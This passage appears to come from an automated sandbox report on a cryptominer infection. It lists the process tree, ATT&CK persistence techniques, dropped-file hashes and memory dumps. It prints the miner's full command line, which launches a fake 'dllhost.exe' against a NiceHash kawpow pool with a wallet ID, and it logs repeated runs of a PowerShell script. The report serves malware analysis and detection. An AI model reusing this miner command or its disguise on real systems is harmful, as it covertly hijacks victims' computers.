"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\dllhost.exe" --algo kawpow --server kawpow.auto.nicehash.com:9200 --user 3DQcoD7sYrZpWDcNerDchoDFE3t7VZNYqp.4gb --proto stratum
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3648

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\dllhost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\dllhost.exe" --algo kawpow --server kawpow.auto.nicehash.com:9200 --user 3DQcoD7sYrZpWDcNerDchoDFE3t7VZNYqp.4gb --proto stratum --watchdog_child_process0
3⤵
- Executes dropped EXE
PID:1560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -file "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2528

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1640 -s 2728
2⤵
- Program crash
PID:4876

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 432 -p 1640 -ip 1640
1⤵
PID:2336

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6c47b3f4e68eebd47e9332eebfd2dd4e

SHA1
67f0b143336d7db7b281ed3de5e877fa87261834

SHA256
8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c

SHA512
0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
a88385f186843dee8f932ce73f778d40

SHA1
5143b95cd06e5a5af05116b98646b6888fcd9a79

SHA256
43df807d34435447422e941f64d91cef01ac0c66ffd113ed45df6dabba130b67

SHA512
4a9d9640ef877befbb840b694d6db206d58e78bc7e85e0363462ffb92388228153a2852435bc19d9e5b4e817e79375c88299651fd5dfa541034a2d02f28a6545

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
a88385f186843dee8f932ce73f778d40

SHA1
5143b95cd06e5a5af05116b98646b6888fcd9a79

SHA256
43df807d34435447422e941f64d91cef01ac0c66ffd113ed45df6dabba130b67

SHA512
4a9d9640ef877befbb840b694d6db206d58e78bc7e85e0363462ffb92388228153a2852435bc19d9e5b4e817e79375c88299651fd5dfa541034a2d02f28a6545

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e3e140322cbecee18976031f638808f9

SHA1
6183b4bc2cdafde10401f9cc51a9ed864705f3a4

SHA256
df3b7fea45b7ba1a3655f18108efe96d78864507aabade410a3eca43d011fac6

SHA512
555db795737197f2a45f3ab3c315e85861b3809d99503afb1e7eb543142cd852bf7e8859303b3dd4896e1b4fd77437b3027641be749b80d1f25227fd4ce357b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
05620aa51e58f0aceb61a63a732da27c

SHA1
fde97464844041ce10534a99cedb0cd854904c98

SHA256
d96a50c612cfc4ea203d552c262672edff17a75f33e41d1e22980959fa3509e7

SHA512
73b7310ee5e911d72fef4ee03e39a7b90947b9ae51e378d6a1ecaca3af570d941e7ae0479858b958ec9867136c4b92baa8109000c18b2941b0a1f4fe28bc7b26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
880e95da20f5ab3708fc2c94056c2382

SHA1
fc619ab9edfacdd1ed31b3b1c580548ba2af367f

SHA256
03c67e84655c735055dcd28e0e995463d7fbe48ff4aeb3dadc70231a802d1910

SHA512
ea81a5bd810f75c6eeca17a3d970f8d4f90d4e1f92af249a059024a0997353c4f2172f9ebb91a67579559bfe0035df3e49ba8b17fd4087a50c845eec9896a5b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
db577a35dffbc4755c1efa928e6e0f70

SHA1
8a7f0ceef1e1c072f1b75b13fba4137959533ca6

SHA256
a0e81b26f66e200e807e23a1f7d142eb9b0a4527a91b6c29cc0535546a2ca3fb

SHA512
361c0a2e646a23074cb851e166e6b982e726d7792323526f646a68a6e4194033b061b3d84c7aa4596f9f9ff0b6d887b5eb3901bd55ee15fb6708ad51efca293c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
033279a1845397613fe28506ae7465c4

SHA1
9ba4f3340eb1692b7d705bebece1da7702c64f4e

SHA256
efa05b5cac251c86a6e3b09eeb22326bc1633b787952d7a2776883f7207b1aa4

SHA512
ff32741c69b6e625214ae9d7d2599646fd7ba3520dcbd447b080dcff78153e7ba5645302a76be652c1aa888e355700b347a73c3dc00b38ae4b81d665ad1d8112

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4ae6fdad195d5fb024896735ac0b4a4d

SHA1
174ae0517d9fe700b387d69314f6ab1583634908

SHA256
241a3d42d23bb38f9a713284fd23554fb3e425841b49f0d447527c73379dfed0

SHA512
be89da945b74d46bbae8f0c1b05f03e2133681bf6afa448f2703ab4b7b2986b9a6b07aa24e1bf0bc3c1629425b1281d5281d96dfcd8cf58a630c67f8d215cd40

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
74b12c15b363a3f78db1d10c1adceeb1

SHA1
e632b1517ece984183ba7c59b9971c4eed1b676b

SHA256
8d2757b82179f6aeae9739dc71f2949ebc3c2d2a2dd57352ef8a75c9cd5d6940

SHA512
6673bccb0e0acecf2e2ca0be7b8dcdce5c3ca0b5fbff740b506cab853a797ef3228d4f121f1566f5a01dec692ac31a334fc86dfadbbfe33d0dc6af104855f9d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
97c1c5a7b0b4cde432b7c707aebb51bb

SHA1
ade24e490d8e625eb6a992bc7f5cc762e707f05c

SHA256
0cc42ba6868fa14a899d0cfc2bb72d1f2fa01faaf852c6af0a039e71d4610889

SHA512
223df67d0f06c27998b4d754b6cfc8be3cebcdd59f5b956941a9b2d688d140e498f6a3d79a33431341c73e48169e4e43c6bdce91b728f0bffabceeb3a2bae50b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
168cd6329b1d54be9379aa35baade0bf

SHA1
120d92301e172734e969dc3ede2c287d964af6cd

SHA256
18212160baf67cc6b097c52aeb6b5204d4f885716f74fc8e9a1aef263d588047

SHA512
7e3fe1e7e268c8257288a419fbec49c531cbdc55e3bdd3fc88d734b6b8d039ca3ed10b4c571a3d4e0130d2bffedf5ccb652b3bb47808e0a1e89af5fe64ad9376

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
9de1c4fe022dcb9bcd3db16defcd5cdf

SHA1
ccfd2e3a2d3faa43be4f12834482fc8fd7551daf

SHA256
1cf39a4acc924f61cc77ddb66655d4ff5bc373222f3c21a368e10d1b3d51abba

SHA512
9a3d67d1a08b8134dc18b33c958ff493918b5d57c03691c2b4c92e4ae4a611bdca372b7ca8ad8130a3c4817d34d96d8c8725bea1db9ded84aee50ad58d89cd77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
9bed95b0c738e09b872d7cd4987b5e94

SHA1
ff5e981d95f7ecade8a8a1b1b07f59d6b27cfe58

SHA256
9da4487f6d10188777ad35ab25f93a7140235841de011feb2cf5cf4defc1fce3

SHA512
d5638837fd5bf7608caa5f46225f603c942bcd968c10399b500a1dda9c55c21699697a1fd68d67269a3fb7257fc89623922947d5e3bb0b4633d0ce439ff8f475

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0cb3c684f3e5f31f0f0cd80008946d05

SHA1
0de4db969bfbe755a704099b0746d555c60bc01f

SHA256
1b4d3c0a3dd61ffe3304c2cf82a4ff75b54a8c10719d3afe30aaee45329c20aa

SHA512
05cdb41d3583ee4bca5c32665a780487d37598381739acd07b6c8034fd6103909cf8b3a640267628091049bda30c87ade2323a933455c798b7e580248e30cad1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a6af25334fd7bf0585811c226b44cc2f

SHA1
5fb80d24d7d2397469141fffaa84769d909a2b5b

SHA256
d4d4e75415b2f892c11fb7c1be31d3c70bd9b04dc72ea1f018e5ad78dc6ffdd2

SHA512
8066953d5880065a651e4a2068cc92782a7971fe3c61d485b2fa9feef6e23142699013fda595524f07c807e805087fd9a879bdd9e79d975c85d12498a61d6e6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
14c5e3cbc5f5de96a91f4ff7f8c9ab72

SHA1
ce0e846304ad465823205711876a81f2b21798ab

SHA256
3143b9c3248a11d070c27ece3cd1b87c87a3abe65a178c86146e2c8072f564a0

SHA512
43c24c01f2d8931113aaa1e7f3bfa0970d1773aab7f8e5b33fb45c11e6ad58be55d046cb9bdb76f36c3f63d6417163de2d724497931583f9cfaa07562e1f0b46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4dd12da7537b49a946c1f0cb242a417c

SHA1
e6a9f3449f8c8e113375172af06b4698212d7b6d

SHA256
8ae39508d29a783787393500ba173570c92a68031821fddaf8caca8eb52ba185

SHA512
00d382c81b878bea8a55df9002bae36662232717cf6177115ba8d9a932d4804ee6d431dcade4e101f41134babc55e0d19812139b356c83700d9edb92479a22f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3303ce17791ba17f1b9abdcd4ec9f489

SHA1
f49af5d5e410840fa5178b1cba11a7def7d5f277

SHA256
5be0e285a5461b848dff89177591fb313315d66295d89cb906b4e47f482daaae

SHA512
f5b1a59c4d195de2076773024ef9b2a14852833e359c6087ed2aaf824c5d44d4e861c7ab73d8e7f92a1155081a539887b216e785b5913babd44f55e3519b39f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
73ea6e29c660b2589e2b7be5598259ee

SHA1
bea2b566b7021354a9c4d4008a0bccde4acae473

SHA256
88e7473f32de317fdf50f170ed4fded854ec687ab54b999dc740bea1ae18478f

SHA512
4e3e768b72987831cb5020c8ff1b51396d2a0183e3c2a1fb41703a54c45131f7967d25b984208b2c0f5a9ab235e29aac3b135d91f2599f7148e901a198b5981f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0ad6bade668a50a1626d5f0ae308a879

SHA1
53414eea0502a22945d649a31ead2f90a7a9b573

SHA256
5a5f17265a55fcc18aa2633999e6810a53b924d65d8e02e5e4855165c8302d21

SHA512
ab58eeb54bafc73a9c9ccdc4e59239a0fb905898d950ab06a84a743acf1a0114a52d93ba7989349839ecc4baa551e060711a8bd016de69cb4f2cffbbb0a3ac85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f9b73b6acbb5e39703ae4ec15bd4395b

SHA1
5cdf878f1177b47d5e7d39040963e90fccbc7416

SHA256
ebde86712ad221555858d4b523edc464b18906a54b0edeaff210db690fd1b359

SHA512
0d7501ae812e223fb11f4ffc1effe2f438faa2fbc438f181edee203f9497e53bab8101d367f0e82c752fb4ae3a94ef4727d449f7c6f61aa97d67476bf1efc517

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
cee02fb75ed9d4034e3861d1db10af80

SHA1
74e5595ab5fa484e2bd84b0c38b5d9dbc262393e

SHA256
60f141a74d8629953e50c32a9e70af8cc0ef5fc559eade11a0cd040d6903c683

SHA512
3e5a9a84bea8b9f7dd33445b858b9a9cfd11cb4f923a74faa82b9274265660da09b07d4baa8c1c8b6131951e3f55db7eb50719c21188a5af3e3546524dfe7555

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0ba2fc85ebb3f5950c53d879aac2cad0

SHA1
9b5827a0ee084ce0252dcde5255dcc833d467395

SHA256
4bc2f92fd0f4e92ed4ae5bf6ee691c1efee7078e0054c0b279757682632dbe94

SHA512
6b4eb58b7aaf225a8b9c50222d27e07a8ac8d918c62a6569531696449e0e55623444c49f1a7c0643e5198c5cde1e290a68b9e2995f3dcd724359e67884d95d7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2c88a9a6b19a87f86235dcb2b27794c7

SHA1
07dac21bca550f5962f425d18fea039b78925fd3

SHA256
2ce63939db578d39b0e1218e4c84e5e7eca5700a52bd4dc4a08aa8da0423dafa

SHA512
203ef9ce294eee0b029d2405328aba13127185f8c22d4b8d97c32ce596f54a782232076b900e1a2c33c8d143cfa9fca5fcbd0a6ebee7809e284497cc48abf199

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
9e146ab082af158cb925675b5cf91824

SHA1
2c1b3cc706af2b3ec7323baab71ef5e1dc33b5f3

SHA256
48e52f7017eb88c87b16d5881bc98cc4ef31495451a800ba908599f5acd49307

SHA512
d685f0a2e08947f2291a8c3e70b3b393aef9c52e6b54981354eb3519c069f8e2036d586e7e750b86afab5e81e86537c8a7d91aa1a2555e605a97771e5effdb01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
90ee85481290d760ac43acd7ca53cda1

SHA1
4c9a8b2904a54a079c2faeccab8c61299859ad73

SHA256
b6f43136dd9ecbe0a75422e0db7e3bfdfd42e971842f59e1ae897db95a6049c0

SHA512
ef27fc98cc6e37e960c08b64ef1f60a4bfa580236bdb7ec8259fd21cf4c7590514b8faeb7aa65b66998c427385b7c1ab35cbe363490aa95620da66f005322042

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\dllhost.exe
Filesize
21.0MB

MD5
5d0cd0c2f23e9e39f543f144696636b9

SHA1
6e41a86949429fcf3d643292755cd9d57e974783

SHA256
e4045d16945e1601550610cc01fc549197c0ec3dedaa5c0ea3f16a97116ab995

SHA512
7e4ec7184865257a3045125d7350f50be9c4d571eeac5a60f84f3fdeac78c1e62273f20e2ed4700e08f2075e9a56a81f8374a19460409674f485b16dace3173c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\dllhost.exe
Filesize
21.0MB

MD5
5d0cd0c2f23e9e39f543f144696636b9

SHA1
6e41a86949429fcf3d643292755cd9d57e974783

SHA256
e4045d16945e1601550610cc01fc549197c0ec3dedaa5c0ea3f16a97116ab995

SHA512
7e4ec7184865257a3045125d7350f50be9c4d571eeac5a60f84f3fdeac78c1e62273f20e2ed4700e08f2075e9a56a81f8374a19460409674f485b16dace3173c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\dllhost.exe
Filesize
21.0MB

MD5
5d0cd0c2f23e9e39f543f144696636b9

SHA1
6e41a86949429fcf3d643292755cd9d57e974783

SHA256
e4045d16945e1601550610cc01fc549197c0ec3dedaa5c0ea3f16a97116ab995

SHA512
7e4ec7184865257a3045125d7350f50be9c4d571eeac5a60f84f3fdeac78c1e62273f20e2ed4700e08f2075e9a56a81f8374a19460409674f485b16dace3173c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1
Filesize
195B

MD5
3fc7331a41ca14b3f0612dca54280c0b

SHA1
268a86fcccda74521796b064d94ade71c030a28e

SHA256
a08bc1d7e1d0420d98c5ceef16149490ba96daa378ca0702b26be52a61317e8a

SHA512
2f6fd8ae164f3b0a1256989ba3e0697ce6fd03ab82b7e32f687a582970d84a9a5f223ac447ec4ea80d4a23cd91621f58b0a5427d6dc4987fbc32eb574f52190f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\VideoDefault.txt
Filesize
83KB

MD5
5dc2bb7bb272c0a3a66cdb4193b3d6f7

SHA1
e91f2109f415c7c95cdae91fff86c2702e39e549

SHA256
2d8677c7cc0f14aa18e54cfc7c2c71f40653c961d528ded0f69bd3ff068a5be3

SHA512
a0d1b3a95da4dd8bd285e646ca33b442062a6cf4f5c7b2a34aae3130be5b540b68fe9b66261bae722f872d889108ce4bbc3db4d9029fa138fb0539b909116d62

Download Submit
C:\Windows\System32\ShellExperiences\Windows Host.xml
Filesize
2KB

MD5
9e93561661b2e92ddfe63c88393a3f98

SHA1
0d800e1c82e991bc112f07a362a06431481d9104

SHA256
59bcc29db777038617caa9b76d0e227e5c0e7fecb513736653973170f5cabcae

SHA512
5fbb1f058fad00fd53cbdc7adc0286b74b48e4eb10c9f1da2bd22fd43622f1ce1cff55ca5e6dec6f18febcfdbb7ff50d22256517869cb6d9c6c7de88fd1831f3

Download Submit
memory/260-259-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/260-258-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/260-256-0x0000000000000000-mapping.dmp

Download
memory/480-159-0x0000000000000000-mapping.dmp

Download
memory/816-188-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/816-186-0x0000000000000000-mapping.dmp

Download
memory/816-189-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/1264-212-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/1264-208-0x0000000000000000-mapping.dmp

Download
memory/1264-210-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/1560-184-0x0000000000000000-mapping.dmp

Download
memory/1616-135-0x0000000000000000-mapping.dmp

Download
memory/1616-137-0x00000178D26F0000-0x00000178D2712000-memory.dmp

Filesize
136KB

Download
memory/1616-138-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/1616-153-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/1640-209-0x0000026019800000-0x0000026019804000-memory.dmp

Filesize
16KB

Download
memory/1640-270-0x0000026019807000-0x000002601980C000-memory.dmp

Filesize
20KB

Download
memory/1640-202-0x0000026018B29000-0x0000026018B2F000-memory.dmp

Filesize
24KB

Download
memory/1640-281-0x0000026019807000-0x000002601980C000-memory.dmp

Filesize
20KB

Download
memory/1640-231-0x0000026019804000-0x0000026019807000-memory.dmp

Filesize
12KB

Download
memory/1640-169-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/1640-133-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/1640-222-0x0000026019800000-0x0000026019804000-memory.dmp

Filesize
16KB

Download
memory/1640-132-0x000002607E110000-0x000002607E11C000-memory.dmp

Filesize
48KB

Download
memory/1640-219-0x0000026019804000-0x0000026019807000-memory.dmp

Filesize
12KB

Download
memory/1640-192-0x0000026018B29000-0x0000026018B2F000-memory.dmp

Filesize
24KB

Download
memory/1712-174-0x0000000000000000-mapping.dmp

Download
memory/1736-156-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/1736-140-0x0000000000000000-mapping.dmp

Download
memory/1736-147-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/1796-179-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/1796-175-0x0000000000000000-mapping.dmp

Download
memory/1796-180-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/1832-178-0x0000000000000000-mapping.dmp

Download
memory/1884-144-0x0000000000000000-mapping.dmp

Download
memory/1900-252-0x0000000000000000-mapping.dmp

Download
memory/1900-254-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/1900-255-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/2088-172-0x0000000000000000-mapping.dmp

Download
memory/2136-190-0x0000000000000000-mapping.dmp

Download
memory/2136-194-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/2136-193-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/2192-251-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/2192-250-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/2192-248-0x0000000000000000-mapping.dmp

Download
memory/2244-226-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/2244-225-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/2244-223-0x0000000000000000-mapping.dmp

Download
memory/2256-173-0x0000000000000000-mapping.dmp

Download
memory/2312-142-0x0000000000000000-mapping.dmp

Download
memory/2332-267-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/2332-266-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/2332-264-0x0000000000000000-mapping.dmp

Download
memory/2428-165-0x0000000000000000-mapping.dmp

Download
memory/2528-286-0x0000000000000000-mapping.dmp

Download
memory/2936-141-0x0000000000000000-mapping.dmp

Download
memory/3084-139-0x0000000000000000-mapping.dmp

Download
memory/3144-134-0x0000000000000000-mapping.dmp

Download
memory/3188-146-0x0000000000000000-mapping.dmp

Download
memory/3256-242-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/3256-240-0x0000000000000000-mapping.dmp

Download
memory/3256-243-0x00007FFE2FEB0000-0x00007FFE30971000-memory.dmp

Filesize
10.8MB

Download
memory/3312-213-0x0000000000000000-mapping.dmp

Download
